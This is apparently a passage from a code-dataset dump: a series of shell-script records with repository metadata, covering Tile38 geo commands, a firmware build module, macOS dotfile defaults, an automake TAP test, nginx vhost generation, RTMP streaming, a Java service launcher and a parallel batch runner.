DROP $KEY
SET location me OBJECT $(geoJson Polygon [[[35.6590,139.6982],[35.6589,139.6978],[35.6577,139.6965],[35.6574,139.6964],[35.6572,139.6966],[35.6575,139.6973],[35.6580,139.6988],[35.6587,139.6984],[35.6590,139.6982]]])
SET $KEY polygon:P OBJECT $(geoJson Polygon [[[35.6587,139.6984],[35.6590,139.6983],[35.6589,139.6979],[35.6586,139.6980],[35.6587,139.6984]]])
SET $KEY polygon:Q OBJECT $(geoJson Polygon [[[35.6591,139.6967],[35.6595,139.6960],[35.6589,139.6958],[35.6586,139.6965],[35.6591,139.6967]]])
SET $KEY road:R OBJECT $(geoJson LineString [[35.6584,139.6954],[35.6567,139.6970]])
SET $KEY road:S OBJECT $(geoJson LineString [[35.6585,139.6994],[35.6575,139.6953]])
INTERSECTS $KEY IDS GET location me
EOF
}
commands-3 | while read line
do
exec_tile38_cli "$line"
done
| true
|
a4a1ce25c2878ae64d581b8170a2e0fa0926f89c
|
Shell
|
xakep666/build
|
/moduleconfigs/dtc/dtc.sh
|
UTF-8
| 1,594
| 2.6875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#
# Copyright (C) 2016 The EFIDroid Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
if [ ! -z "$MODULE_ARCH" ];then
DTC_MAKE_ARGS="$DTC_MAKE_ARGS AR=${GCC_LINUX_TARGET_PREFIX}ar"
DTC_MAKE_ARGS="$DTC_MAKE_ARGS AS=${GCC_LINUX_TARGET_PREFIX}as"
DTC_MAKE_ARGS="$DTC_MAKE_ARGS CC=${GCC_LINUX_TARGET_PREFIX}gcc"
DTC_MAKE_ARGS="$DTC_MAKE_ARGS CXX=${GCC_LINUX_TARGET_PREFIX}g++"
DTC_MAKE_ARGS_STATIC="CFLAGS=\"-static\""
fi
Compile() {
"$TOP/build/tools/lns" -rf "$MODULE_DIR/" "$MODULE_OUT"
if [ ! -z "$MODULE_ARCH" ];then
# compile supported targets only
"$MAKEFORWARD" "$EFIDROID_MAKE" -C "$MODULE_OUT/dtc" $DTC_MAKE_ARGS libfdt
"$MAKEFORWARD" "$EFIDROID_MAKE" -C "$MODULE_OUT/dtc" $DTC_MAKE_ARGS $DTC_MAKE_ARGS_STATIC convert-dtsv0 dtc fdtdump fdtget fdtput
else
"$MAKEFORWARD" "$EFIDROID_MAKE" -C "$MODULE_OUT/dtc" $DTC_MAKE_ARGS
fi
}
Clean() {
if [ -f "$MODULE_OUT/dtc" ];then
"$MAKEFORWARD" "$EFIDROID_MAKE" -C "$MODULE_OUT/dtc" $DTC_MAKE_ARGS clean
fi
}
DistClean() {
rm -Rf "$MODULE_OUT/"*
}
| true
|
7b512d6f57d052e557f11d48cd6a73507c8fecf5
|
Shell
|
toddabrahm/dotfiles
|
/.osx
|
UTF-8
| 9,307
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/bash
# Ask for the administrator password upfront
sudo -v
# Keep-alive: update existing `sudo` time stamp until `.osx` has finished
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &
###############################################################################
# General UI/UX #
###############################################################################
# # Menu bar: disable transparency
defaults write NSGlobalDomain AppleEnableMenuBarTransparency -bool false
# # Menu bar: hide the useless Time Machine and Volume icons
defaults write com.apple.systemuiserver menuExtras -array "/System/Library/CoreServices/Menu Extras/Bluetooth.menu" "/System/Library/CoreServices/Menu Extras/AirPort.menu" "/System/Library/CoreServices/Menu Extras/Battery.menu" "/System/Library/CoreServices/Menu Extras/Clock.menu"
# Disable the “Are you sure you want to open this application?” dialog
defaults write com.apple.LaunchServices LSQuarantine -bool false
###############################################################################
# Trackpad, mouse, keyboard, Bluetooth accessories, and input #
###############################################################################
# Set a blazingly fast keyboard repeat rate
defaults write NSGlobalDomain KeyRepeat -int 0
# # Disable auto-correct
defaults write NSGlobalDomain NSAutomaticSpellingCorrectionEnabled -bool false
###############################################################################
# Screen #
###############################################################################
# Save screenshots to the desktop
defaults write com.apple.screencapture location -string "$HOME/Desktop"
# Save screenshots in PNG format (other options: BMP, GIF, JPG, PDF, TIFF)
defaults write com.apple.screencapture type -string "png"
# Disable shadow in screenshots
defaults write com.apple.screencapture disable-shadow -bool true
# Enable subpixel font rendering on non-Apple LCDs
defaults write NSGlobalDomain AppleFontSmoothing -int 2
###############################################################################
# Finder #
###############################################################################
# Finder: disable window animations and Get Info animations
defaults write com.apple.finder DisableAllAnimations -bool true
# Finder: show hidden files by default
defaults write com.apple.Finder AppleShowAllFiles -bool true
# Finder: show all filename extensions
defaults write NSGlobalDomain AppleShowAllExtensions -bool true
# Finder: show status bar
defaults write com.apple.finder ShowStatusBar -bool true
# Finder: allow text selection in Quick Look
defaults write com.apple.finder QLEnableTextSelection -bool true
# Display full POSIX path as Finder window title
defaults write com.apple.finder _FXShowPosixPathInTitle -bool true
# # When performing a search, search the current folder by default
defaults write com.apple.finder FXDefaultSearchScope -string "SCcf"
# # Disable the warning when changing a file extension
defaults write com.apple.finder FXEnableExtensionChangeWarning -bool false
# Avoid creating .DS_Store files on network volumes
defaults write com.apple.desktopservices DSDontWriteNetworkStores -bool true
# Show item info below icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:showItemInfo true" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:showItemInfo true" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:showItemInfo true" ~/Library/Preferences/com.apple.finder.plist
# Enable snap-to-grid for icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:arrangeBy grid" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:arrangeBy grid" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:arrangeBy grid" ~/Library/Preferences/com.apple.finder.plist
# Increase grid spacing for icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:gridSpacing 100" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:gridSpacing 100" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:gridSpacing 100" ~/Library/Preferences/com.apple.finder.plist
# Increase the size of icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:iconSize 80" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:iconSize 80" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:iconSize 80" ~/Library/Preferences/com.apple.finder.plist
# Use list view in all Finder windows by default
# Four-letter codes for the other view modes: `icnv`, `clmv`, `Flwv`
defaults write com.apple.Finder FXPreferredViewStyle -string "Nlsv"
# Disable the warning before emptying the Trash
defaults write com.apple.finder WarnOnEmptyTrash -bool false
# Empty Trash securely by default
defaults write com.apple.finder EmptyTrashSecurely -bool true
# Show the ~/Library folder
chflags nohidden ~/Library
###############################################################################
# Dock & hot corners #
###############################################################################
# Speed up Mission Control animations
defaults write com.apple.dock expose-animation-duration -float 0.1
# Don’t show Dashboard as a Space
defaults write com.apple.dock dashboard-in-overlay -bool true
# Remove the auto-hiding Dock delay
defaults write com.apple.Dock autohide-delay -float 0
# Remove the animation when hiding/showing the Dock
defaults write com.apple.dock autohide-time-modifier -float 0
# Automatically hide and show the Dock
defaults write com.apple.dock autohide -bool true
# Add iPhone Simulator.app to Launchpad
ln -s /Applications/Xcode.app/Contents/Applications/iPhone\ Simulator.app ~/Applications
###############################################################################
# Safari & WebKit #
###############################################################################
# # Set Safari’s home page to `about:blank` for faster loading
defaults write com.apple.Safari HomePage -string "about:blank"
# # Enable the Develop menu and the Web Inspector in Safari
defaults write com.apple.Safari IncludeDevelopMenu -bool true
defaults write com.apple.Safari WebKitDeveloperExtrasEnabledPreferenceKey -bool true
defaults write com.apple.Safari com.apple.Safari.ContentPageGroupIdentifier.WebKit2DeveloperExtrasEnabled -bool true
# # Add a context menu item for showing the Web Inspector in web views
defaults write NSGlobalDomain WebKitDeveloperExtras -bool true
###############################################################################
# Mail #
###############################################################################
# Copy email addresses as `foo@example.com` instead of `Foo Bar <foo@example.com>` in Mail.app
defaults write com.apple.mail AddressesIncludeNameOnPasteboard -bool false
###############################################################################
# Terminal #
###############################################################################
# # Only use UTF-8 in Terminal.app
defaults write com.apple.terminal StringEncodings -array 4
###############################################################################
# Address Book, Dashboard, iCal, TextEdit, and Disk Utility #
###############################################################################
# # Use plain text mode for new TextEdit documents
defaults write com.apple.TextEdit RichText -int 0
# # Open and save files as UTF-8 in TextEdit
defaults write com.apple.TextEdit PlainTextEncoding -int 4
defaults write com.apple.TextEdit PlainTextEncodingForWrite -int 4
###############################################################################
# Kill affected applications #
###############################################################################
for app in "Address Book" "Calendar" "Contacts" "Dock" "Finder" "Mail" \
"Safari" "SizeUp" "SystemUIServer" "Terminal" "Transmission" "Twitter" \
"iCal" "iTunes"; do
killall "$app" > /dev/null 2>&1
done
echo "Done. Note that some of these changes require a logout/restart to take effect."
| true
|
36d89a54a0b2b0aafdf16247c0b594deb3c39b5d
|
Shell
|
KatieMishra/VoiceClassification
|
/sphinxbase/autoconf-2.69/automake-1.14/t/tap-no-spurious-numbers.sh
|
UTF-8
| 1,874
| 3.3125
| 3
|
[
"GPL-2.0-or-later",
"GPL-1.0-or-later",
"GPL-2.0-only",
"GPL-3.0-only",
"FSFAP",
"GPL-3.0-or-later",
"Autoconf-exception-3.0",
"LicenseRef-scancode-other-copyleft",
"MIT",
"BSD-2-Clause"
] |
permissive
|
#! /bin/sh
# Copyright (C) 2011-2013 Free Software Foundation, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# TAP support:
# - we shouldn't spuriously recognize as TAP result numbers what it
# not, even if it seems pretty close
. test-init.sh
. tap-setup.sh
cat > prefixes <<'END'
A
a
_
+
-
=
/
*
.
:
,
;
$
@
%
&
#
?
!
|
\
"
`
'
(
)
[
]
{
}
<
>
END
n=$(wc -l <prefixes)
# See the loop below to understand this initialization.
pass=$(($n * 3))
fail=$pass
skip=$(($pass - 3))
xfail=$skip
xpass=$xfail
error=0
total=$(($pass + $fail + $skip + $xfail + $xpass))
echo 1..$total > all.test
highno=1000
for result in 'ok' 'not ok'; do
for spacing in "" " " "$tab"; do
subst="$result &$spacing$higno"
sed -e "s|.*|$subst|" prefixes
for directive in TODO SKIP; do
test "$result $directive" != "not ok SKIP" || continue
sed -e '/^#$/d' -e "s|.*|$subst # $directive|" prefixes
done
done
done >> all.test
cat all.test # For debugging.
# Sanity checks.
grep '#.*#' all.test \
&& framework_failure_ "creating all.test"
test $(wc -l <all.test) -lt $highno \
|| framework_failure_ "creating all.test"
run_make -O -e IGNORE check
count_test_results total=$total pass=$pass fail=$fail skip=$skip \
xpass=$xpass xfail=$xfail error=$error
:
| true
|
abacee45dc763029a120b440325d3af1ffc9b871
|
Shell
|
qnyblog/lempstack
|
/menu/controller/ssl/remove
|
UTF-8
| 4,605
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
######################################################################
# Auto Install & Optimize LEMP Stack on CentOS 7, 8 #
# #
# Author: Sanvv - HOSTVN Technical #
# Website: https://hostvn.vn #
# #
# Please do not remove copyright. Thank! #
# Please do not copy under any circumstance for commercial reason! #
######################################################################
# shellcheck disable=SC2154
# shellcheck disable=SC2034
source /var/hostvn/menu/validate/rule
source /var/hostvn/menu/helpers/function
printf "%s=================%s\n" "${GREEN}" "${NC}"
printf "%sGo bo SSL tra phi%s\n" "${GREEN}" "${NC}"
printf "%s=================%s\n" "${GREEN}" "${NC}"
echo
edit_vhost(){
cat >> "${VHOST_DIR}/${domain}.conf" << END
upstream php-${user} {
server ${fastcgi_pass}
}
server {
listen 80;
server_name ${domain} www.${domain};
#access_log off;
#access_log /home/${user}/${domain}/logs/access.log;
#error_log off;
error_log /home/${user}/${domain}/logs/error.log;
${root}
index index.php index.html index.htm;
${rewrite}
location ~ \.php\$ {
try_files \$uri =404;
fastcgi_split_path_info ^(.+\.php)(/.+)\$;
fastcgi_index index.php;
include /etc/nginx/fastcgi_params;
include /etc/nginx/extra/nginx_limits.conf;
fastcgi_param SCRIPT_FILENAME \$document_root\$fastcgi_script_name;
if (-f \$request_filename)
{
fastcgi_pass php-${user};
}
}
${brute}
include /etc/nginx/extra/staticfiles.conf;
include /etc/nginx/extra/security.conf;
${wp_secure}
${xmlrpc}
}
END
}
edit_vhost_nodejs(){
cat >> "${VHOST_DIR}/${domain}.conf" << END
server {
listen 80;
#listen [::]:80;
server_name ${domain} www.${domain};
#access_log off;
#access_log /home/${user}/${domain}/logs/access.log;
#error_log off;
error_log /home/${user}/${domain}/logs/error.log;
root /home/${user}/${domain}/public_html;
#index index.php index.html index.htm;
location / {
proxy_pass http://127.0.0.1:${proxy_port};
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
include /etc/nginx/extra/staticfiles.conf;
include /etc/nginx/extra/security.conf;
}
END
}
_run(){
check_nginx_status
if [ -z "${ALERT}" ]; then
user=$(grep -w "username" "${USER_DIR}/.${domain}.conf" | cut -f2 -d'=');
php_mode="$(grep "php_mode" "${USER_DIR}/.${domain}.conf" | cut -f2 -d'=')"
select_source
doc_root "${SOURCE}" "${user}" "${domain}"
if [[ "${SOURCE}" == "wordpress" ]]; then
wp_secure="include /etc/nginx/wordpress/wordpress_secure.conf;"
xmlrpc="include /etc/nginx/wordpress/disable_xmlrpc.conf;"
brute_force_wp "${user}"
fi
rm -rf /etc/nginx/conf.d/"${domain}".conf
set_rewrite
fastcgi
if [ "${SOURCE}" == "nodejs" ]; then
while true
do
read -r -p "Nhap Port Nodejs: " proxy_port
if valid_number "${proxy_port}"; then
break
else
clear
printf "%s\n" "${RED}Port khong chinh xac, vui long nhap lai.${NC}"
fi
done
edit_vhost_nodejs
else
edit_vhost
fi
if nginx -t; then
systemctl reload nginx
clear
printf "%sGo bo SSL thanh cong.%s\n" "${GREEN}" "${NC}"
if [[ "${SOURCE}" == "wordpress" ]]; then
printf "%s\n" "${GREEN}Luu y: Ban can cau hinh lai Plugins cache va Plugins Seo tai menu 7-7${NC}"
fi
echo ""
else
printf "%s\n" "${RED}Cau hinh Nginx khong chinh xac. Vui long kiem tra lai${NC}"
fi
else
clear
printf "%s\n" "${ALERT}"
fi
}
ALERT=""
domain=""
select_domain
if [[ -z "${domain}" && -z "${ALERT}" ]]; then
clear
printf "%s\n" "${RED}Ban da chon huy thao tac${NC}"
else
if [ -z "${ALERT}" ]; then
_run
else
clear
printf "%s\n" "${ALERT}"
fi
fi
menu_sslpaid
| true
|
b9bf61cfdd5894c39f6cb796ede617aa5050c27a
|
Shell
|
bartt/henhouse
|
/ustream
|
UTF-8
| 324
| 2.890625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
RTMP_URL=$1
STREAM_KEY=$2
if [[ -z $RTMP_URL || -z $STREAM_KEY ]]; then
echo "usage: ustream RTMP-URL STREAM-KEY"
exit 1
fi
raspivid -n -vf -hf -t 0 -w 960 -h 540 -fps 25 -b 500000 -o - 2> /dev/null | ffmpeg -i - -vcodec copy -an -metadata title="HenHouse Cam" -f flv $RTMP_URL/$STREAM_KEY 2> /dev/null
| true
|
9ee348ea2823face31c8b3bff23495c73f2e540b
|
Shell
|
adevore3/dotfiles
|
/autojump/functions/make_project_symlink.func
|
UTF-8
| 728
| 4.1875
| 4
|
[
"Unlicense",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Create a symlink for repo based on the jira project name
function make_project_symlink() {
local repo_file="repo.cfg"
if [ ! -f $repo_file ]; then
echo "ERROR: '$repo_file' does NOT exist, exiting..."
return 1
fi
jira_project=$(cat $repo_file | grep jira | cut -d= -f2)
jira_project_lowercase=$(echo "$jira_project" | tr '[:upper:]' '[:lower:]')
local fqpn=$(pwd)
# Create symlink in parent directory
cd ..
if [ -d $jira_project_lowercase ]; then
echo "ERROR: '$jira_project_lowercase' is already a directory, exiting..."
return 1
fi
ln -s $fqpn $jira_project_lowercase
# verify symlink works and end up back where we started
cd $jira_project_lowercase
cd -P .
}
| true
|
803c5878ede11605181e964b836937bc273d998d
|
Shell
|
ln3012/my1repo
|
/ifelse
|
UTF-8
| 224
| 3.75
| 4
|
[] |
no_license
|
#!/bin/sh
# Script to see whether argument is positive or negative
if [ $# -eq 0 ]
then
echo "$0 : You must give numerics only"
exit 1
fi
if test $1 -gt 0
then
echo "$1 positive number"
else
echo "$1 negative number"
fi
| true
|
f7698503beba214db6ee608d59b72c1497eaa643
|
Shell
|
chittineni8/docker-compose-magento
|
/bin/inapp
|
UTF-8
| 105
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
if [ -z "$1" ];then
docker-compose exec app bash
else
docker-compose exec $1 bash
fi
| true
|
4d7065ed61079b1ccbd198e73940eec09f950028
|
Shell
|
yuelicn/apollo
|
/scripts/apollo-on-kubernetes/apollo-portal-server/scripts/startup-kubernetes.sh
|
UTF-8
| 3,021
| 3.453125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
SERVICE_NAME=apollo-portal
## Adjust log dir if necessary
LOG_DIR=/opt/logs/apollo-portal-server
## Adjust server port if necessary
SERVER_PORT=8070
# SERVER_URL="http://localhost:$SERVER_PORT"
SERVER_URL="http://${APOLLO_PORTAL_SERVICE_NAME}:${SERVER_PORT}"
## Adjust memory settings if necessary
#export JAVA_OPTS="-Xms2560m -Xmx2560m -Xss256k -XX:MetaspaceSize=128m -XX:MaxMetaspaceSize=384m -XX:NewSize=1536m -XX:MaxNewSize=1536m -XX:SurvivorRatio=8"
## Only uncomment the following when you are using server jvm
#export JAVA_OPTS="$JAVA_OPTS -server -XX:-ReduceInitialCardMarks"
########### The following is the same for configservice, adminservice, portal ###########
export JAVA_OPTS="$JAVA_OPTS -XX:ParallelGCThreads=4 -XX:MaxTenuringThreshold=9 -XX:+DisableExplicitGC -XX:+ScavengeBeforeFullGC -XX:SoftRefLRUPolicyMSPerMB=0 -XX:+ExplicitGCInvokesConcurrent -XX:+HeapDumpOnOutOfMemoryError -XX:-OmitStackTraceInFastThrow -Duser.timezone=Asia/Shanghai -Dclient.encoding.override=UTF-8 -Dfile.encoding=UTF-8 -Djava.security.egd=file:/dev/./urandom"
export JAVA_OPTS="$JAVA_OPTS -Dserver.port=$SERVER_PORT -Dlogging.file=$LOG_DIR/$SERVICE_NAME.log -XX:HeapDumpPath=$LOG_DIR/HeapDumpOnOutOfMemoryError/"
# Find Java
if [[ -n "$JAVA_HOME" ]] && [[ -x "$JAVA_HOME/bin/java" ]]; then
javaexe="$JAVA_HOME/bin/java"
elif type -p java > /dev/null 2>&1; then
javaexe=$(type -p java)
elif [[ -x "/usr/bin/java" ]]; then
javaexe="/usr/bin/java"
else
echo "Unable to find Java"
exit 1
fi
if [[ "$javaexe" ]]; then
version=$("$javaexe" -version 2>&1 | awk -F '"' '/version/ {print $2}')
version=$(echo "$version" | awk -F. '{printf("%03d%03d",$1,$2);}')
# now version is of format 009003 (9.3.x)
if [ $version -ge 011000 ]; then
JAVA_OPTS="$JAVA_OPTS -Xlog:gc*:$LOG_DIR/gc.log:time,level,tags -Xlog:safepoint -Xlog:gc+heap=trace"
elif [ $version -ge 010000 ]; then
JAVA_OPTS="$JAVA_OPTS -Xlog:gc*:$LOG_DIR/gc.log:time,level,tags -Xlog:safepoint -Xlog:gc+heap=trace"
elif [ $version -ge 009000 ]; then
JAVA_OPTS="$JAVA_OPTS -Xlog:gc*:$LOG_DIR/gc.log:time,level,tags -Xlog:safepoint -Xlog:gc+heap=trace"
else
JAVA_OPTS="$JAVA_OPTS -XX:+UseParNewGC"
JAVA_OPTS="$JAVA_OPTS -Xloggc:$LOG_DIR/gc.log -XX:+PrintGCDetails"
JAVA_OPTS="$JAVA_OPTS -XX:+UseConcMarkSweepGC -XX:+UseCMSCompactAtFullCollection -XX:+UseCMSInitiatingOccupancyOnly -XX:CMSInitiatingOccupancyFraction=60 -XX:+CMSClassUnloadingEnabled -XX:+CMSParallelRemarkEnabled -XX:CMSFullGCsBeforeCompaction=9 -XX:+CMSClassUnloadingEnabled -XX:+PrintGCDateStamps -XX:+PrintGCApplicationConcurrentTime -XX:+PrintHeapAtGC -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=5M"
fi
fi
printf "$(date) ==== Starting ==== \n"
cd `dirname $0`/..
chmod 755 $SERVICE_NAME".jar"
./$SERVICE_NAME".jar" start
rc=$?;
if [[ $rc != 0 ]];
then
echo "$(date) Failed to start $SERVICE_NAME.jar, return code: $rc"
exit $rc;
fi
tail -f /dev/null
| true
|
ad8d0e7902bb5dc868a76ea979c1b6b56de24764
|
Shell
|
JayjeetAtGithub/seissol-workflows
|
/workflows/scc18-containerless/scripts/run.sh
|
UTF-8
| 966
| 3.34375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
if [ -z "$SEISSOL_SRC_DIR" ]; then
echo "Expecting SEISSOL_SRC_DIR variable"
exit 1
fi
if [ -z "$OMP_NUM_THREADS" ]; then
echo "No OMP_NUM_THREADS variable defined"
exit 1
fi
if [ -z "$MPI_NUM_PROCESSES" ]; then
echo "No MPI_NUM_ROCESSES variable defined"
exit
fi
if [ -z "$SEISSOL_END_TIME" ]; then
echo "No SEISSOL_END_TIME variable defined"
exit 1
fi
REPO_DIR="$PWD/"
BASE_PATH="$REPO_DIR/workflows/scc18-containerless"
EXECUTION_DIR="$BASE_PATH/execution"
source "$BASE_PATH/scripts/setup-env.sh"
SEISSOL_BIN="$(ls $REPO_DIR/$SEISSOL_SRC_DIR/build/SeisSol_*)"
cp "$SEISSOL_BIN" "$EXECUTION_DIR"
mkdir -p "$EXECUTION_DIR/output"
# run
cd "$EXECUTION_DIR"
sed -i "s#EndTime = .*#EndTime = $SEISSOL_END_TIME#" parameters_zenodo_easi.par
echo "$REPO_DIR/$SEISSOL_SRC_DIR/Maple/" > DGPATH
mpirun \
--oversubscribe \
-np "$MPI_NUM_PROCESSES" \
"$SEISSOL_BIN" \
parameters_zenodo_easi.par > output/stdout.txt
| true
|
3d861d6d1663526df77c495a0d421fcf18ceb6c9
|
Shell
|
dingmeikun/plugins
|
/ltts-data-plugin/src/main/resources/bin/volley
|
UTF-8
| 8,487
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/ksh
HOST_TYPE=`uname -s | tr "-" "_"`
if [ $HOST_TYPE = "Linux" ]
then
alias echo="echo -e"
fi
#
# volley Parallel Process
#
# Default Value
#---------------------
Ver=2.1 # Version
Tty=`tty | awk -F \/ '{print $3"/"$4}'` # Terminal
cpuUse=2 # Max CPU Cost
cpuFree=20 # Min CPU Free
endLine=`tput lines` # Screen EndLine
vLine=`expr $endLine - 6` # volley Lines
expr \( `tput cols` + 1 \) / 27 | read vCol # volley Cols
if [ $vLine -lt 1 -o $vCol -lt 3 ]; then
echo "Err: Screen is Too Small to show Menu (7*80 at least)"
exit
fi
maxP=`expr $vLine \* $vCol` # Max Channel
if [ $maxP -gt 1024 ]; then
echo "Err: More than 1024 Channels, To reduce the screen"
exit
fi
Volley=$maxP # Max Parallels
AutoKey=1 # Auto-KeyPress Model (C-Continue, Q-Quite)
usage(){
cat <<-!!! |
*
*volley : Parallel Process $Ver
*
*Usage:
* volley [-parameter...] BatFile
*Parameter:
* -u Max CPU Cost per Process (Default $cpuUse)
* -f Min CPU Idle (Default $cpuFree)
* -v Max concurrency (1-$Volley) (Default $Volley)
* -k Backgroup model (C: Continue when Err, Q: Quite When Err)
*BatchFile note:
* #Comment
* !BAT File Name
* %Command1_desc Command1
* Command2
* ========== (Waiting For last Command Finished)
* %Command3_desc Command3
*Output file:
* BateFile.err Error process & Error Info
* BateFile.bak Fail Command & Unexecuted Command
*
!!!
awk -F'*' '{ print $2 }'
exit
}
# Prepare Parameter
#---------------------
while getopts :u:f:v:k: OPTION
do
case $OPTION in
u)
test $OPTARG -ge 0 -a $OPTARG -le 99 2>/dev/null
if [ $? -ne 0 ]; then usage; fi
cpuUse=$OPTARG ;;
f)
test $OPTARG -ge 0 -a $OPTARG -le 99 2>/dev/null
if [ $? -ne 0 ]; then usage; fi
cpuFree=$OPTARG ;;
v)
test $OPTARG -ge 1 -a $OPTARG -le $Volley 2>/dev/null
if [ $? -ne 0 ]; then usage; fi
Volley=$OPTARG ;;
k)
if [ "$OPTARG" = "C" -o "$OPTARG" = "Q" ]; then
AutoKey=$OPTARG
else
usage
fi ;;
?)
usage ;;
esac
done
shift `expr $OPTIND - 1`
if [ $# -ne 1 ]; then usage; fi
if [ ! -f $1 ]; then usage; fi
cpuFree=`expr $cpuFree + $cpuUse`
# Variable
#--------------------------------------
tsk=0 # Total Tasks
fnd=0 # Finished Tasks
err=0 # Error Tasks
run=0 # Processing Tasks
free=$Volley # Free process
errbz=0 # Error Flag
cpuIdle=0 # cpu Idle
#--------------------------------------
fbat=$1 # BAT File
ftmp=$1.tmp # Tmp File
ferr=$1.err # Err File
fbak=$1.bak # Bak File
bname="Parallel Process" # BAT File Name
#--------------------------------------
# y,x Array for coordinate
# pn Array for process name
# id Array for process ID
# pe Process Order
#--------------------------------------
# STTYSAVE # Terminal Info
# Test Output
#--------------------
>$ftmp
if [ $? -ne 0 ]; then
echo "Permission is Forbidden"
exit
fi
rm $ftmp
# Test Input
#---------------------
read tsk<<-!!
`awk '{
if(NF==0) next;
c=substr($1,1,1)
if(c=="#" || c=="=" || c=="!") next;
print $1
}' $fbat | wc -l`
!!
if [ $tsk -lt 1 ]; then
echo "Input File <$fbat> Invalid!"
exit
fi
a=`grep "^!" $fbat | head -1`
if [ -n "$a" ]; then
bname=`expr substr "$a" 2 78`
fi
# Init
#----------------------------------
if [ "$AutoKey" = "0" ]; then
STTYSAVE="`stty -g`"
stty -echo
fi
clear
a=`awk -v vCol=$vCol 'BEGIN{ for(i=3;i<vCol;i++)printf("- -------------------------"); print "" }'`
echo "[1m$bname[0m"
echo "----------------------------------------------------- -------------------------$a"
echo " Miss: Fins: Errs: Pros:0 CpuFree:"
echo "[3;24H$tsk"
echo "----------------------------------------------------- -------------------------$a"
echo "[`expr $endLine - 1`;0H\c"
echo "----------------------------------------------------- -------------------------$a"
echo " Volley$Ver\c"
awk -v vLine=$vLine -v vCol=$vCol -v Volley=$Volley '
BEGIN{
for(vc=0;vc<vCol;vc++)
for(vl=0;vl<vLine;vl++)
{
i=vl+vc*vLine;
y=vl+5;
x=vc*27+1;
printf "y[%d]=%d;\t",i,y
printf "x[%d]=%d;\t",i,x
printf "pn[%d]=%d;\t",i,i
printf "id[%d]=0;\t",i
printf "pe[%d]=%d;\t",i,i+1
printf "echo \"[%d;%dH.\\c\"\n",y,x
}
}' >$ftmp
. $ftmp
echo "[$endLine;16HStartTime`date +%X` CurrentTime\c"
if [ "$AutoKey" = "0" ]; then
stty raw
fi
# Function
#-----------------------
# Waiting for Key Press
gWaitKey(){
while :; do
FTmp=`dd if=/dev/tty bs=1 count=1 2>/dev/null`
if [ `expr index "$FTmp" "$1"` -eq 1 ]; then break; fi
done
echo $FTmp
}
# Refresh Process & Free Process
freeidle(){
# Refresh Time
echo "[$endLine;43H`date +%X`[D\c"
# Finished Process
echo "${id[*]}" |
awk -v fnd=$fnd -v Tty=$Tty '
BEGIN{
cmd="ps -t "Tty
i=0
while(cmd|getline a){
if(++i==1) continue
split(a,b)
ps[b[1]]=0
}
run=0
RS=" "
}
{
if($1==0) next
if($1 in ps) run++
else
printf "pe[%d]=%d; id[%d]=0;\n",NR-1,++fnd+"'$maxP'",NR-1
}
END{
printf "fnd=%d; echo \"[3;36H%d\\c\"\n",fnd,fnd
printf "run=%d; echo \"[3;60H%d [D[D\\c\"\n",run,run
printf "free=%d\n","'$Volley'"-run
}' >$ftmp
. $ftmp
# Refresh Errors
a=`grep "^%" $fbak | wc -l`
if [ $a -ne $err ]; then
err=$a
echo "[3;48H$err\c"
fi
# Refresh CPU Idle
cpuIdle=`sar 1 1 | tail -1 | awk '{print $8}' | awk -F \. '{print $1}'`
if [ -z "$cpuIdle" ]
then
cpuIdle=99
fi
echo "[3;75H$cpuIdle% [D[D[D\c"
}
# Return blank unless Find a free process
idle(){
echo "${pe[*]}" |
awk '
BEGIN{ RS=" "; min=999999; idle=999999; }
{
if($1>0 && $1<min){ min=$1; idle=NR-1; }
}
END{ if(idle<999999) print idle; }
'
}
# Main Function
#----------------------
runflag=1 # Execute Flag 1-execute 2-Quite
